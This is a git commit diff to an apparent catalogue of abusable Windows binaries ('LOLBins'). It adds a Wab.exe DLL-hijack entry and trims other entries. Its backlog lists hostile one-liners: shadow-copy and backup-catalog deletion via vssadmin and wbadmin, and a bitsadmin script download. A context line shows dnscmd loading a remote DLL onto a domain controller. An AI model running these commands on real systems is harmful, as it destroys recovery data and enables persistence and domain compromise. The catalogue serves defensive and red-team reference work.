Cleaning and adding Wab.exe

2018-05-09 15:25:30 +02:00 · 2018-05-09 15:25:30 +02:00 · 118c337dfb
parent 8b1e87b251
commit 118c337dfb
7 changed files with 50 additions and 67 deletions
--- a/Backlog.txt
+++ b/Backlog.txt
@ -3,7 +3,6 @@ Kd.exe			Debugger
 Certreq.exe		Exfiltrate data
 Dbghost.exe
 Robocopy.exe	Needs examples
 Bitsadmin.exe	bitsadmin.exe  /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Execution/Bitsadmin.md $env:TEMP\AtomicRedTeam\bitsadmin_flag.ps1
 Vssadmin.exe	vssadmin.exe Delete Shadows /All /Quiet
 notepad.exe		Gui - Download files using Open (A lot of other programs as well) LOLGuiBins?
 wbadmin.exe 	wbadmin delete catalog -quiet
@ -15,3 +14,5 @@ WseClientSvc.exe	- https://blog.huntresslabs.com/abusing-trusted-applications-a7
 dvdplay.exe		http://www.hexacorn.com/blog/2018/03/15/beyond-good-ol-run-key-part-73/
 http://www.hexacorn.com/blog/category/living-off-the-land/pass-thru-command-execution/
 https://twitter.com/Hexacorn/status/993498264497541120
 https://twitter.com/Hexacorn/status/994000792628719618
 https://github.com/MoooKitty/Code-Execution
--- a/LOLBins.md
+++ b/LOLBins.md
@ -46,12 +46,10 @@ If you are missing from the acknowledgement, please let me know (I did not forge
 [Presentationhost.exe](OSBinaries/Presentationhost.md)     
 [Print.exe](OSBinaries/Print.md)  
 [Psr.exe](OSBinaries/Psr.md)  
 [Qprocess.exe](OSBinaries/Qprocess.md)     
 [Reg.exe](OSBinaries/Reg.md)    
 [Regedit.exe](OSBinaries/Regedit.md)    
 [Regasm.exe](OSBinaries/Regasm.md)    
 [Register-cimprovider.exe](OSBinaries/Register-cimprovider.md)        
 [Regini.exe](OSBinaries/Regini.md)    
 [Regsvcs.exe](OSBinaries/Regsvcs.md)    
 [Regsvr32.exe](OSBinaries/Regsvr32.md)    
 [Replace.exe](OSBinaries/Replace.md)     
@ -63,6 +61,7 @@ If you are missing from the acknowledgement, please let me know (I did not forge
 [Sc.exe](OSBinaries/Sc.md)     
 [Scriptrunner.exe](OSBinaries/Scriptrunner.md)     
 [Syncappvpublishingserver.exe](OSBinaries/Syncappvpublishingserver.md)     
 [Wab.exe](OSBinaries/Wab.md)     
 [Wmic.exe](OSBinaries/Wmic.md)     
 [Wscript.exe](OSBinaries/Wscript.md)    
 [Xwizard.exe](OSBinaries/Xwizard.md)     
--- a/OSBinaries/Dnscmd.md
+++ b/OSBinaries/Dnscmd.md
@ -7,15 +7,19 @@ dnscmd.exe dc1.lab.int /config /serverlevelplugindll \\192.168.0.149\dll\wtf.dll
 ```
 Acknowledgements:
-* Dimitrios Slamaris - @dim0x69
+* Shay Ber - ?   
 * Dimitrios Slamaris - @dim0x69    
 * Nikhil SamratAshok Mittal - @nikhil_mitt   
 Code sample:
 * 
 Resources:
 * https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83
 * https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html
 * https://github.com/dim0x69/dns-exe-persistance/tree/master/dns-plugindll-vcpp
 * https://twitter.com/Hexacorn/status/994000792628719618
 * http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html
 Full path:
 ```
--- a/OSBinaries/Qprocess.md
+++ b/OSBinaries/Qprocess.md
@ -1,31 +0,0 @@
 ## Qprocess.exe
 * Functions: Credentials
 ```
 qprocess /SERVER:RemoteServer
 ```
 Acknowledgements:
 * Rahmat Nurfauzi - @infosecn1nja    
 Code sample:
 *    
 Resources:
 * https://twitter.com/infosecn1nja/status/987268926139592706
 Full path:
 ```
 c:\windows\system32\Qprocess.exe
 ```
 Notes:
 Some specific details about the binary file.
 Detection:
 Details about detection.
 IOC, Behaviour , User Agents etc
--- a/OSBinaries/Regini.md
+++ b/OSBinaries/Regini.md
@ -1,30 +0,0 @@
 ## Regini.exe
 * Functions: Credentials
 ```
 regini -m \\RemoteServer Example
 ```
 Acknowledgements:
 * Osanda Malith - @OsandaMalith
 Code sample:
 * 
 Resources:
 * https://twitter.com/OsandaMalith/status/987823644402372608    
 * https://ss64.com/nt/regini.html    
 Full path:
 ```
 c:\windows\system32\regini.exe
 c:\windows\sysWOW64\regini.exe
 ```
 Notes:
 Can also be used to add registry keys
 Detection:
--- a/OSBinaries/Wab.md
+++ b/OSBinaries/Wab.md
@ -0,0 +1,38 @@
 ## Wab.exe
 * Functions: Execute
 ```
 Wab.exe (requires registry changes)
 ```
 Acknowledgements:
 * Adam - @Hexacorn
 Code sample:
 * 
 Resources:
 * http://www.hexacorn.com/blog/2018/05/01/wab-exe-as-a-lolbin/
 * https://twitter.com/Hexacorn/status/991447379864932352
 Full path:
 ```
 C:\Program Files\Windows Mail\wab.exe    
 C:\Program Files (x86)\Windows Mail\wab.exe    
 ```
 Notes:
 Searches for wab.dll. Can be manipulated with the following registry key:
 ```
 HKLM\Software\Microsoft\WAB\DLLPath
 ```
 Binary is used to manage Windows contacts/wab files. (Legacy)
 Detection:
 Look for registry changes to HKLM\Software\Microsoft\WAB\DLLPath
--- a/OtherMSBinaries/Sqldumper.md
+++ b/OtherMSBinaries/Sqldumper.md
@ -21,11 +21,13 @@ Resources:
 Full path:
 ```
-C:\Program Files\Microsoft SQL Server\90\Shared\SQLDumper.exe
+C:\Program Files\Microsoft SQL Server\90\Shared\SQLDumper.exe   
 C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exe   
 ```
 Notes:
-
+Part of SQL server, but also Office in some versions.